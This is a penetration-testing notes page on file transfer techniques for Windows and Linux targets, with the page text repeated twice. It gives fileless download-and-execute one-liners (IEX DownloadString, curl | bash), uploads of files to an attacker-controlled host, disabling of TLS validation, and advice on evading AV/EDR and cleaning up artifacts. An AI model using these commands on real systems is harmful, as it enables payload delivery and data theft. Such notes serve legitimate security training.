File Transfer Techniques for Pentesting

Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

Common Challenges

Host-based Controls
- Application whitelisting
- AV/EDR blocking
- Process monitoring
Network Controls
- Firewall restrictions
- IDS/IPS monitoring
- Port filtering

Windows Transfer Techniques

PowerShell Methods

Base64 Transfer (No Network Required)

# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5

Web Downloads

# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>

SMB Transfer

# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test

FTP Transfer

# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')

Living Off The Land (LOtL) Binaries

WMIC
Bitsadmin
Certutil
Regsvr32

Linux Transfer Techniques

Base64 Transfer

# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file

Web Transfer Methods

Download

# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3

Upload

# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

SSH/SCP Transfer

# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory

Simple Web Server

# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000

Common Issues & Solutions

SSL/TLS Issues (Windows)

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Port Considerations

HTTP/HTTPS (80/443) - Usually allowed
SMB (445) - Often blocked
FTP (20/21) - May be filtered
SSH/SCP (22) - May require configuration

Security Best Practices

Transfer Verification
- Always verify file integrity (MD5/SHA)
- Check file permissions after transfer
Operational Security
- Clean up temporary files
- Remove credentials after use
- Monitor for security alerts
- Use encryption when possible
Fileless Operations
- Prefer memory-only operations
- Clean up artifacts
- Be aware of logging/monitoring
Network Security
- Use HTTPS/FTPS when available
- Consider file size limitations
- Monitor for AV/EDR alerts

PreviousOpenVAS (GVM) Vulnerability Scanner Notes NextAdvanced File Transfer Techniques

File Transfer Techniques for Pentesting

Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

Common Challenges

Host-based Controls
- Application whitelisting
- AV/EDR blocking
- Process monitoring
Network Controls
- Firewall restrictions
- IDS/IPS monitoring
- Port filtering

Windows Transfer Techniques

PowerShell Methods

Base64 Transfer (No Network Required)

# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5

Web Downloads

# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>

SMB Transfer

# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test

FTP Transfer

# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')

Living Off The Land (LOtL) Binaries

WMIC
Bitsadmin
Certutil
Regsvr32

Linux Transfer Techniques

Base64 Transfer

# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file

Web Transfer Methods

Download

# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3

Upload

# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

SSH/SCP Transfer

# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory

Simple Web Server

# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000

Common Issues & Solutions

SSL/TLS Issues (Windows)

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Port Considerations

HTTP/HTTPS (80/443) - Usually allowed
SMB (445) - Often blocked
FTP (20/21) - May be filtered
SSH/SCP (22) - May require configuration

Security Best Practices

Transfer Verification
- Always verify file integrity (MD5/SHA)
- Check file permissions after transfer
Operational Security
- Clean up temporary files
- Remove credentials after use
- Monitor for security alerts
- Use encryption when possible
Fileless Operations
- Prefer memory-only operations
- Clean up artifacts
- Be aware of logging/monitoring
Network Security
- Use HTTPS/FTPS when available
- Consider file size limitations
- Monitor for AV/EDR alerts

PreviousOpenVAS (GVM) Vulnerability Scanner Notes NextAdvanced File Transfer Techniques